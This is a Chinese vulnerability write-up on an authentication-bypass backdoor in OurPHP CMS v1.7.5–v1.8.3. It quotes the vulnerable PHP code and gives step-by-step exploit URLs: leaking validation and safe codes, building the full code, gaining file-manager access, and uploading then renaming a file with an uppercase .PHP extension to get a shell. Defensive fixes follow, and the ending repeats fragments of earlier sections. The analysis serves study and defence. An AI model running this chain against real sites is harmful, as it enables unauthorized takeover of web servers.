OurPHP CMS 后门漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本漏洞存在于OurPHP CMS (v1.7.5-v1.8.3)中，涉及一个设计不当的后门机制，允许攻击者通过暴露的系统安全校验码和口令码获取系统管理权限，最终可能导致任意文件操作和getshell。<\/p>

漏洞影响范围<\/h2>

OurPHP CMS v1.7.5 至 v1.8.3 版本<\/li> <\/ul>

漏洞详细分析<\/h2>

1. 安全校验码泄露点<\/h3>

文件路径<\/strong>: function\/editor\/php\/upload_json.php<\/code><\/p>

if<\/span>(isset<\/span>($_GET["upload_file"<\/span>])){
<\/span><\/span>    $json =<\/span> new<\/span> Services_JSON<\/span>();
<\/span><\/span>    echo<\/span> $json -><\/span> uploadsafe<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>文件路径<\/strong>: function\/editor\/php\/json.php<\/code> (第238行)<\/p>
function<\/span> uploadsafe<\/span>() {
<\/span><\/span>    global<\/span> $ourphp;
<\/span><\/span>    return<\/span> '<!--'<\/span>.<\/span>$ourphp['validation'<\/span>].<\/span>'||'<\/span>.<\/span>substr<\/span>($ourphp['safecode'<\/span>], 0<\/span>, 32<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>此函数会返回两个关键信息：<\/p>

系统口令码($ourphp['validation']<\/code>)<\/li>
安全校验码的前32位(substr($ourphp['safecode'], 0, 32)<\/code>)<\/li>
<\/ol>
2. 安全校验码生成机制<\/h3>
文件路径<\/strong>: function\/install\/index.php<\/code> (第288行)<\/p>
$ourphp_safecode =<\/span> getRandomString<\/span>(32<\/span>);
<\/span><\/span>$safecode6 =<\/span> substr<\/span>($ourphp_safecode , 6<\/span> , 6<\/span>);
<\/span><\/span><\/code><\/pre>安全校验码由两部分组成：<\/p>

32位随机字符串<\/li>
从第6位开始取6位字符<\/li>
<\/ol>
最终的安全校验码为：$ourphp_safecode.$safecode6<\/code><\/p>
3. 权限验证绕过点<\/h3>
文件路径<\/strong>: client\/manage\/ourphp_filebox.php<\/code> (第45行)<\/p>
if<\/span> (@<\/span>$_GET['validation'<\/span>] ==<\/span> $ourphp['validation'<\/span>] &&<\/span> $_GET['code'<\/span>] ==<\/span> $ourphp['safecode'<\/span>]){
<\/span><\/span>    $_SESSION['ourphp_outtime'<\/span>] =<\/span> time<\/span>() +<\/span> 3600<\/span>;
<\/span><\/span>    $_SESSION['ourphp_out'<\/span>] =<\/span> "ourphp"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过提供正确的validation<\/code>(口令码)和code<\/code>(完整安全校验码)，攻击者可以绕过管理员认证，直接获取文件管理权限。<\/p>
4. 文件操作漏洞<\/h3>
文件重命名漏洞<\/strong> (832行):<\/p>
function<\/span> renam<\/span>($rename, $nrename, $folder) {
<\/span><\/span>    global<\/span> $meurl,$folder;
<\/span><\/span>    $php =<\/span> explode<\/span>('.'<\/span>,$nrename);
<\/span><\/span>    $php =<\/span> end<\/span>($php);
<\/span><\/span>    if<\/span>($php ==<\/span> 'php'<\/span> ||<\/span> $php ==<\/span> 'asp'<\/span> ||<\/span> $php ==<\/span> 'jsp'<\/span> ||<\/span> $php ==<\/span> 'aspx'<\/span>){
<\/span><\/span>        printerror<\/span>("重命名出错!"<\/span>);
<\/span><\/span>        exit<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>此过滤机制可以通过大小写绕过(如.PHP, .PhP等)。<\/p>
漏洞利用步骤<\/h2>
第一步：获取系统敏感信息<\/h3>
访问URL获取口令码和安全校验码部分：<\/p>
http:\/\/target.com\/function\/editor\/php\/upload_json.php?upload_file=aaa
<\/code><\/pre>
响应示例：<\/p>
<!--12345||QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkm
<\/code><\/pre>
解析：<\/p>

口令码(validation): 12345<\/code><\/li>
安全校验码前32位: QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkm<\/code><\/li>
<\/ul>
第二步：构造完整安全校验码<\/h3>
根据代码分析，完整安全校验码由两部分组成：<\/p>

前32位(已获取)<\/li>
从前32位中第6位开始的6位字符<\/li>
<\/ol>
计算第二部分：<\/p>
原始32位: QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkm
从第6位(0-based)开始取6位: YHlDUg
<\/code><\/pre>
完整安全校验码: QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkmYHlDUg<\/code><\/p>
第三步：获取文件管理权限<\/h3>
使用获取的凭证访问文件管理页面：<\/p>
http:\/\/target.com\/client\/manage\/ourphp_filebox.php?op=home&folder=.\/&validation=12345&code=QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkmYHlDUg
<\/code><\/pre>
第四步：文件操作<\/h3>

上传文件<\/strong>：通过文件管理功能上传恶意文件<\/li>
重命名绕过<\/strong>：将无害文件(如.txt)重命名为.php文件(使用大小写变种，如.PHP)<\/li>
<\/ol>
防御措施<\/h2>

升级到最新版本OurPHP CMS<\/li>
修改默认的口令码和安全校验码<\/li>
删除或限制访问upload_json.php<\/code>文件<\/li>
加强文件类型检查，使用strtolower统一小写比较<\/li>
实现更安全的权限验证机制<\/li>
<\/ol>
总结<\/h2>
此漏洞利用链展示了从信息泄露到权限提升再到文件操作的全过程，攻击者可以通过系统暴露的敏感信息构造有效的攻击请求，最终获取系统控制权。开发者在设计安全机制时应避免将敏感信息暴露在前端，并实现更严格的权限验证和文件操作限制。<\/p>

OurPHP CMS 后门漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> 本漏洞存在于OurPHP CMS (v1.7.5-v1.8.3)中，涉及一个设计不当的后门机制，允许攻击者通过暴露的系统安全校验码和口令码获取系统管理权限，最终可能导致任意文件操作和getshell。<\/p>

漏洞详细分析<\/h2>

漏洞利用步骤<\/h2>

漏洞概述<\/h2>
本漏洞存在于OurPHP CMS (v1.7.5-v1.8.3)中，涉及一个设计不当的后门机制，允许攻击者通过暴露的系统安全校验码和口令码获取系统管理权限，最终可能导致任意文件操作和getshell。<\/p>